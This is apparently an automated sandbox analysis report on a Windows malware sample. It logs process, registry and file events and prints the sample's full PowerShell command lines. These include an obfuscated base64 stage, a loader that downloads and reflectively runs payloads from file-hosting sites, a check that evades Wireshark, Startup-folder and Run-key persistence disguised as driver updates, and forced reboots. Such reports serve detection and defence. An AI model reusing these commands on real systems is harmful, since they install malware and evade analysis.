Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $hzjmp = 'Ow' + [char]66 + '9ADsAIA' + [char]66 + 'pAFQAQw' + [char]66 + '2AFgAJAAgAGUAbA' + [char]66 + 'pAEYALQAgAHMAcw' + [char]66 + 'hAHAAeQ' + [char]66 + 'CACAAeQ' + [char]66 + 'jAGkAbA' + [char]66 + 'vAFAAbg' + [char]66 + 'vAGkAdA' + [char]66 + '1AGMAZQ' + [char]66 + '4AEUALQAgAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAIA' + [char]66 + 'pAFQAQw' + [char]66 + '2AFgAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAE8AbQ' + [char]66 + 'tAGYAUgAkADsAIAApACAAJwAxAHMAcAAuADMAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAGkAVA' + [char]66 + 'DAHYAWAAkADsAIAAnADsAKQAgACkAIAAnACcAbQ' + [char]66 + 'zAGEAZw' + [char]66 + 'lAHIAXAA5ADEAMwAwADMALgAwAC4ANA' + [char]66 + '2AFwAaw' + [char]66 + 'yAG8Adw' + [char]66 + 'lAG0AYQ' + [char]66 + 'yAGYAXA' + [char]66 + '0AGUAbgAuAHQAZg' + [char]66 + 'vAHMAbw' + [char]66 + 'yAGMAaQ' + [char]66 + 'tAFwAcw' + [char]66 + '3AG8AZA' + [char]66 + 'uAGkAdw' + [char]66 + 'cADoAYw' + [char]66 + 'EAEQAIA' + [char]66 + 'EACcAJwAgACwAIAAnACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACcAIAAsACAAJwAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + '0AGUAbA' + [char]66 + 'kAHIAdQ' + [char]66 + 'tAC4Acg' + [char]66 + 'vAC8ALw' + [char]66 + 'pAG0AYQ' + [char]66 + 'nAGUAcwAvAGcAbA' + [char]66 + 'vAGIAYQ' + [char]66 + 'sAHgAMQAuAGoAcA' + [char]66 + 'nACcAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJwAnAEkAVg' + [char]66 + 'GAHIAcAAnACcAIAAoAGQAbw' + [char]66 + 'oAHQAZQAnACAAPQArACAATw' + [char]66 + 'tAG0AZg' + [char]66 + 'SACQAOwAgACcATQ' + [char]66 + '0AGUARwAuACkAIAAnACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAJwAgACgAZQ' + [char]66 + 'wAHkAVA' + [char]66 + '0AGUARwAnACAAPQArACAATw' + [char]66 + 'tAG0AZg' + [char]66 + 'SACQAOwAgACcALgApACAAcg' + [char]66 + 'GAGQAWQ' + [char]66 + 'SACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAJwAgACsAIAAnADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAJwAgAD0AKwAgAE8AbQ' + [char]66 + 'tAGYAUgAkADsAIAAnADsAIAApACAAKQAnACcAQQAnACcALAAnACcAkyE6AJMhJwAnACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAcgAuAEcAZQ' + [char]66 + 'hAHkAcgAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwA0ADYAZQ' + [char]66 + '	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $LTkZZ = $host.Version.Major.Equals(2) ;if ( $LTkZZ ) {$fbKNY = ( [System.IO.Path]::GetTempPath() );del ( $fbKNY + '\Upwin.msu' );$kwxxg = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $EhgVw ) {$kwxxg = $menos ;}else {$kwxxg = ($kwxxg) ;};$dmpdz = (New-Object Net.WebClient);$dmpdz.Encoding = [System.Text.Encoding]::UTF8;$dmpdz.DownloadFile( $kwxxg, ($fbKNY + '\Upwin.msu') );$GAwCW = ( 'C:\Users\' + [Environment]::UserName );$glAoE = ($fbKNY + '\Upwin.msu'); powershell.exe wusa.exe $glAoE /quiet /norestart ; Copy-Item 'C:\Users\user\AppData\Local\Temp\x.vbs' -Destination ( $GAwCW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$Stringbase;Function BaseMy{;$RYdFr = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $RYdFr;};$lthpd = ('https://www.pastery.net/jvfvkt/raw/' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' );$webClient = New-Object System.Net.WebClient ;$FAwUL = $webClient.DownloadString( $lthpd ) ;$Stringbase = $FAwUL; $FAwUL = BaseMy;$FAwUL \| Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$jQcVn = ( [System.IO.Path]::GetTempPath() + 'dll02.txt' ) ;$cqiGn = New-Object System.Net.WebClient ;$cqiGn.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$ziUMM = $cqiGn.DownloadData( $nFuQG ) ;$tMRHF = [System.Text.Encoding]::UTF8.GetString($ziUMM);$tMRHF \| Out-File -FilePath $jQcVn -force ;$RfmmO = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'' ) ; $ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$RfmmO += '[Byte[]] $RYdFr = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$RfmmO += '[System.AppDomain]:' + ':CurrentDomain.Load( $RYdFr ).' ;$RfmmO += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$RfmmO += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''gpj.1xlabolg/segami//or.murdlet//:sptth'' , ''C:\Users\user\AppData\Local\Temp\x.vbs'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\regasm'' ) );' ;$XvCTi = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$RfmmO \| Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nicme.ps1'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nicme.ps1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFD9B76D2A5 pushad ; iretd	15_2_00007FFD9B76D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFD9B88BBFB push E85B7CD6h; ret	15_2_00007FFD9B88BBF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFD9B88BBE8 push E85B7CD6h; ret	15_2_00007FFD9B88BBF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFD9B880B4D push E95E533Ah; ret	15_2_00007FFD9B880B79
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFD9B886CB2 pushad ; ret	15_2_00007FFD9B886CC1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFD9B886CC2 pushad ; ret	15_2_00007FFD9B886CC1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00007FFD9B78D2A5 pushad ; iretd	16_2_00007FFD9B78D2A6

Persistence and Installation Behavior

Tries to download and execute files (via powershell)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $LTkZZ = $host.Version.Major.Equals(2) ;if ( $LTkZZ ) {$fbKNY = ( [System.IO.Path]::GetTempPath() );del ( $fbKNY + '\Upwin.msu' );$kwxxg = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $EhgVw ) {$kwxxg = $menos ;}else {$kwxxg = ($kwxxg) ;};$dmpdz = (New-Object Net.WebClient);$dmpdz.Encoding = [System.Text.Encoding]::UTF8;$dmpdz.DownloadFile( $kwxxg, ($fbKNY + '\Upwin.msu') );$GAwCW = ( 'C:\Users\' + [Environment]::UserName );$glAoE = ($fbKNY + '\Upwin.msu'); powershell.exe wusa.exe $glAoE /quiet /norestart ; Copy-Item 'C:\Users\user\AppData\Local\Temp\x.vbs' -Destination ( $GAwCW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$Stringbase;Function BaseMy{;$RYdFr = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $RYdFr;};$lthpd = ('https://www.pastery.net/jvfvkt/raw/' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' );$webClient = New-Object System.Net.WebClient ;$FAwUL = $webClient.DownloadString( $lthpd ) ;$Stringbase = $FAwUL; $FAwUL = BaseMy;$FAwUL \| Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$jQcVn = ( [System.IO.Path]::GetTempPath() + 'dll02.txt' ) ;$cqiGn = New-Object System.Net.WebClient ;$cqiGn.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$ziUMM = $cqiGn.DownloadData( $nFuQG ) ;$tMRHF = [System.Text.Encoding]::UTF8.GetString($ziUMM);$tMRHF \| Out-File -FilePath $jQcVn -force ;$RfmmO = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'' ) ; $ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$RfmmO += '[Byte[]] $RYdFr = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$RfmmO += '[System.AppDomain]:' + ':CurrentDomain.Load( $RYdFr ).' ;$RfmmO += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$RfmmO += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''gpj.1xlabolg/segami//or.murdlet//:sptth'' , ''C:\Users\user\AppData\Local\Temp\x.vbs'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\regasm'' ) );' ;$XvCTi = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$RfmmO \| Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $LTkZZ = $host.Version.Major.Equals(2) ;if ( $LTkZZ ) {$fbKNY = ( [System.IO.Path]::GetTempPath() );del ( $fbKNY + '\Upwin.msu' );$kwxxg = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $EhgVw ) {$kwxxg = $menos ;}else {$kwxxg = ($kwxxg) ;};$dmpdz = (New-Object Net.WebClient);$dmpdz.Encoding = [System.Text.Encoding]::UTF8;$dmpdz.DownloadFile( $kwxxg, ($fbKNY + '\Upwin.msu') );$GAwCW = ( 'C:\Users\' + [Environment]::UserName );$glAoE = ($fbKNY + '\Upwin.msu'); powershell.exe wusa.exe $glAoE /quiet /norestart ; Copy-Item 'C:\Users\user\AppData\Local\Temp\x.vbs' -Destination ( $GAwCW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$Stringbase;Function BaseMy{;$RYdFr = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $RYdFr;};$lthpd = ('https://www.pastery.net/jvfvkt/raw/' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' );$webClient = New-Object System.Net.WebClient ;$FAwUL = $webClient.DownloadString( $lthpd ) ;$Stringbase = $FAwUL; $FAwUL = BaseMy;$FAwUL \| Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$jQcVn = ( [System.IO.Path]::GetTempPath() + 'dll02.txt' ) ;$cqiGn = New-Object System.Net.WebClient ;$cqiGn.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$ziUMM = $cqiGn.DownloadData( $nFuQG ) ;$tMRHF = [System.Text.Encoding]::UTF8.GetString($ziUMM);$tMRHF \| Out-File -FilePath $jQcVn -force ;$RfmmO = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'' ) ; $ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$RfmmO += '[Byte[]] $RYdFr = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$RfmmO += '[System.AppDomain]:' + ':CurrentDomain.Load( $RYdFr ).' ;$RfmmO += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$RfmmO += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''gpj.1xlabolg/segami//or.murdlet//:sptth'' , ''C:\Users\user\AppData\Local\Temp\x.vbs'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\regasm'' ) );' ;$XvCTi = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$RfmmO \| Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};"			Jump to behavior

Boot Survival

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_bsa cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update Drivers NVIDEO_job cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update Drivers NVIDEO_job cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit

Creates multiple autostart registry keys

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update Drivers NVIDEO_job
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_bsa

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_bsa
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_bsa
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update Drivers NVIDEO_job
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update Drivers NVIDEO_job
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update Drivers NVIDEO_job
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update Drivers NVIDEO_job

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
